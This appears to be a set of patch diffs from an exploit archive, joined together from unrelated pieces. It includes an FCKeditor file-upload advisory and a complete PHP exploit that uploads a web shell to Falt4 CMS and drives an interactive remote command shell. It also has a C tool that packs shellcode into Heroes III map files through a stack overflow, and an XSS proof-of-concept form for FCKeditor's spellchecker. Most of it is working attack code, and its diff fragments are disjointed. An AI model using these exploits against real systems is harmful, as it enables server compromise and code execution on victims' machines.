+# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
-#
+#
-# Discover by: Batter
+# Discover by: Batter
-#
+#
-########################################################################
+########################################################################
-
+
-
+
-
+
-####################
+####################
- Vulnerability:
+- Vulnerability:
-####################
+####################
-
+
-/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
+/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
-
+
-Command=FileUpload&Type=File&CurrentFolder=/
+Command=FileUpload&Type=File&CurrentFolder=/
-
+
-####################
+####################
- Exploit:
+- Exploit:
-####################
+####################
-
+
-http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
+http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
-
+
-####################
+####################
- how To use:
+- how To use:
-####################
+####################
-
+
-http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
+http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
-
+
-####################
+####################
- Solution:
+- Solution:
-####################
+####################
-
+
-Restrict and grant only trusted users access to the resources.
+Restrict and grant only trusted users access to the resources.
-
+
-####################
+####################
- Greets :
+- Greets :
-####################
+####################
-
+
-THE.HACKER.ONE , Str0ke
+THE.HACKER.ONE , Str0ke
-
+
-####################
+####################
-
+
-# milw0rm.com [2008-11-19]
+# milw0rm.com [2008-11-19]
--- a/platforms/php/webapps/8060.php
+++ b/platforms/php/webapps/8060.php
@ -1,95 +1,95 @@
-################################################################
+################################################################
-#
+#
-# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
+# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
-#
+#
-# Bug Discovered By : Sp3shial
+# Bug Discovered By : Sp3shial
-#
+#
-# Sp3shial@ymail.com
+# Sp3shial@ymail.com
-#
+#
-# Persian Boys Hacking Team From A Land With A History-Long Background
+# Persian Boys Hacking Team From A Land With A History-Long Background
-#
+#
-# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
+# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
-#
+#
-###############################################################
+###############################################################
-
+
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-
+
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-
+
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
-	$sock = fsockopen($host, 80);
+	$sock = fsockopen($host, 80);
-	while (!$sock)
+	while (!$sock)
-	{
+	{
-		print "\n[-] No response from {$host}:80 Trying again...";
+		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
+		$sock = fsockopen($host, 80);
-	}
+	}
-	fputs($sock, $packet);
+	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
+	fclose($sock);
-	return $resp;
+	return $resp;
-}
+}
-
+
-function connector_response($html)
+function connector_response($html)
-{
+{
-	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
+	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
-}
+}
-
+
-print "\n+------------------------------------------------------------------+";
+print "\n+------------------------------------------------------------------+";
-print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial  |";
+print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial  |";
-print "\n+------------------------------------------------------------------+\n";
+print "\n+------------------------------------------------------------------+\n";
-
+
-if ($argc < 3)
+if ($argc < 3)
-{
+{
-	print "\nUsage......: php $argv[0] host path";
+	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /Falt4/\n";
+	print "\nExample....: php $argv[0] localhost /Falt4/\n";
-	die();
+	die();
-}
+}
-
+
-$host = $argv[1];
+$host = $argv[1];
-$path = ereg_replace("(/){2,}", "/", $argv[2]);
+$path = ereg_replace("(/){2,}", "/", $argv[2]);
-
+
-$filename  = md5(time()).".php";
+$filename  = md5(time()).".php";
-$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
+$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
-
+
-$payload  = "--o0oOo0o\r\n";
+$payload  = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
-$payload .= "Content-Type: application/zip\r\n\r\n";
+$payload .= "Content-Type: application/zip\r\n\r\n";
-$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
+$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
-$payload .= "--o0oOo0o--\r\n";
+$payload .= "--o0oOo0o--\r\n";
-
+
-$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet	.= "Host: {$host}\r\n";
+$packet	.= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
+$packet .= $payload;
-
+
-if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
-else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
+else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
-
+
-$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
+$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
-
+
-$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
+$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Cmd: %s\r\n";
+$packet .= "Cmd: %s\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-
+
-while(1)
+while(1)
-{
+{
-	print "\nFalt4-shell# ";
+	print "\nFalt4-shell# ";
-	$cmd = trim(fgets(STDIN));
+	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
+	if ($cmd != "exit")
-	{
+	{
-		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
+		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
-		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
+		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
-	}
+	}
-	else break;
+	else break;
-}
+}
-
+
-?>
+?>
-
+
-# milw0rm.com [2009-02-16]
+# milw0rm.com [2009-02-16]
--- a/platforms/win64/local/37064.py
+++ b/platforms/win64/local/37064.py
@ -6,6 +6,8 @@
 # Target OS Windows 8.0 - 8.1 x64
 # Author: Matteo Memelli ryujin <at> offensive-security.com
 # EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
 from ctypes import *
 from ctypes.wintypes import *
 import struct, sys, os, time, threading, signal
--- a/platforms/windows/local/37716.c
+++ b/platforms/windows/local/37716.c
@ -0,0 +1,272 @@
 /*
 # Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
 # Date : 2015-07-29
 # Exploit Author : John AAkerblom, Pierre Lindblad
 # Website: http://h3minternals.net
 # Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
 # Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
 # Tested on : Windows XP, Windows 8.1
 # Category: exploits
 # Description:
  This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes 
  of Might and Magic III. Once the map is started in-game, a buffer overflow 
  occuring when loading object sprite names leads to shellcode execution.
  Only basic arbitrary code execution is covered in this PoC but is possible to 
  craft an exploit that lets the game continue normally after the shellcode has
  been executed. Using extensive knowledge of the .h3m format, it is even 
  possible to create a map file that loads like normal in the game's map editor
  (which lacks the vulnerability) but stealthily executes shellcode when opened 
  in-game.
 */
 #include <string.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 /* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
   0xEBFE added at end. Note that a NULL-less payload is not actually needed
 Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 and Peter Ferrie <peter.ferrie@gmail.com>
 All rights reserved.
 Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are met:
    * Redistributions of source code must retain the above copyright
      notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright
      notice, this list of conditions and the following disclaimer in the
      documentation and/or other materials provided with the distribution.
    * Neither the name of the copyright holder nor the names of the
      contributors may be used to endorse or promote products derived from
      this software without specific prior written permission.
 THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
 INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
 static const uint8_t CALC_PAYLOAD[] = {
    0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
    0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
    0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
    0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
    0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
    0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
    0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
 };
 /*
 * The memmem() function finds the start of the first occurrence of the
 * substring 'needle' of length 'nlen' in the memory area 'haystack' of
 * length 'hlen'.
 *
 * The return value is a pointer to the beginning of the sub-string, or
 * NULL if the substring is not found.
 *
 * Original author: caf, http://stackoverflow.com/a/2188951
 */
 static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
 {
    uint8_t needle_first;
    uint8_t *p = haystack;
    size_t plen = hlen;
    if (!nlen)
        return NULL;
    needle_first = *(uint8_t  *)needle;
    while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
    {
        if (!memcmp(p, needle, nlen))
            return p;
        p++;
        plen = hlen - (p - haystack);
    }
    return NULL;
 }
 #ifdef _MSC_VER
    #pragma warning(disable:4996) // M$ fopen so unsafe
 #endif
 #pragma pack(push, 1)
 // exploit struct
 // .h3m files contain an array of object attributes - OA - in which each
 // entry starts with a string length and then a string for an object sprite.
 // This exploit overflows the stack with a malicious sprite name.
 struct exploit_oa_t
 {
    uint32_t size; // size of the rest of this struct, including shellcode
    // The rest of the struct is the sprite name for the OA, <size> bytes of 
    // which an CALL ESP-gadget address is placed so that it overwrites the
    // return address, when ESP is called shellcode2 will be executed. An 
    // additional 2 "anticrash" gadgets are needed so the game does not crash 
    // before returning to the CALL ESP-gadget.
    uint8_t nullbyte; // Must be 0x00, terminating sprite name
    uint8_t overwritten[6]; // Overwritten by game
    uint8_t shellcode1[121]; // Mostly not used, some is overwritten
    uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
    // anticrash_gadget1, needs to pass the following code down to final JMP:
    //
    // MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
    // XOR EBX, EBX
    // CMP EAX, EBX
    // JE SHORT <crash spot> ; JMP to crash if EAX is 0
    // MOV CL, BYTE PTR DS : [EAX - 1]
    // CMP CL, BL
    // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
    // CMP CL, 0FF
    // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
    // CPU Disasm
    // CMP EDI, EBX
    // JNE <good spot> ; JMP to good spot. Always occurs if we get this far
    uint32_t anticrash_gadget1;
    // anticrash_gadget2, needs to return out of the following call (tricky):
    //
    // MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
    // CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
    uint32_t anticrash_gadget2;
    // Here at 144 bytes into this struct comes the shellcode that will be 
    // executed. For the game to survive, it is wise to use this only for a 
    // short jmp as doing so means only 2 values have to be restored on the 
    // stack. Namely: original return address and format value of the h3m.
    // This PoC simply puts shellcode here, meaning the game cannot continue
    // after shellcode execution.
    uint8_t shellcode2[];
 };
 struct offsets_t
 {
    uint32_t call_esp_gadget;
    uint32_t anticrash_gadget1;
    uint32_t anticrash_gadget2;
 };
 #pragma pack(pop)
 static const struct offsets_t * const TARGET_OFFSETS[] = { 
    (struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
    (struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
 };
 #define TARGET_DESCS "    1: H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
                     "    2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
 #define MAX_TARGET 2
 // Name of a sprite present in all maps, this is overwritten with exploit
 #define NEEDLE "AVWmrnd0.def"
 int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
 {
    uint8_t *buf = NULL;
    uint8_t *p = NULL;
    long h3m_size = 0;
    long bytes = 0;
    struct exploit_oa_t *exp = NULL;
    // Read entire h3m file into memory
    fseek(h3m_f, 0, SEEK_END);
    h3m_size = ftell(h3m_f);
    rewind(h3m_f);
    buf = malloc(h3m_size);
    if (buf == NULL) {
        puts("[!] Failed to allocate memory");
        return 1;
    }
    bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
    if (bytes != h3m_size) {
        free(buf);
        puts("[!] Failed to read all bytes");
        return 1;
    }
    // Find game object array in .h3m, where we will overwrite the first entry
    p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
    if (p == NULL) {
        puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
        free(buf);
        return 1;
    }
    // Move back 4 bytes from sprite name, pointing to the size of the sprite name
    p -= 4;
    // Overwrite the first game object with exploit
    exp = (struct exploit_oa_t *)p;
    exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
    exp->nullbyte = 0;
    exp->call_esp_gadget = ofs->call_esp_gadget;
    exp->anticrash_gadget1 = ofs->anticrash_gadget1;
    exp->anticrash_gadget2 = ofs->anticrash_gadget2;
    memcpy(exp->shellcode2, payload, payload_size);
    // Write entire file from memory and cleanup
    rewind(h3m_f);
    bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
    if (bytes != h3m_size) {
        free(buf);
        puts("[!] Failed to write all bytes");
        return 1;
    }
    free(buf);
    return 0;
 }
 static void _print_usage(void)
 {
    puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");
    puts("Available targets:");
    puts(TARGET_DESCS);
    puts("Examples:");
    puts("    h3mpacker Arrogance.h3m 1");
    puts("    h3mpacker Deluge.h3m 2");
 }
 int main(int argc, char **argv)
 {
    FILE *h3m_f = NULL;
    int ret = 0;
    int target;
    if (argc != 3) {
        _print_usage();
        return 1;
    }
    h3m_f = fopen(argv[1], "rb+");
    target = strtoul(argv[2], NULL, 0);
    if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
        if (h3m_f != NULL)
            fclose(h3m_f);
        _print_usage();
        return 1;
    }
    ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
    fclose(h3m_f);
    if (ret != 0)
        return ret;
    printf("[+] Payload embedded into h3m file %s\n", argv[1]);
    return 0;
 }
`@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow`

	`FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.`	`FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.`

	`html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>`	`<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>`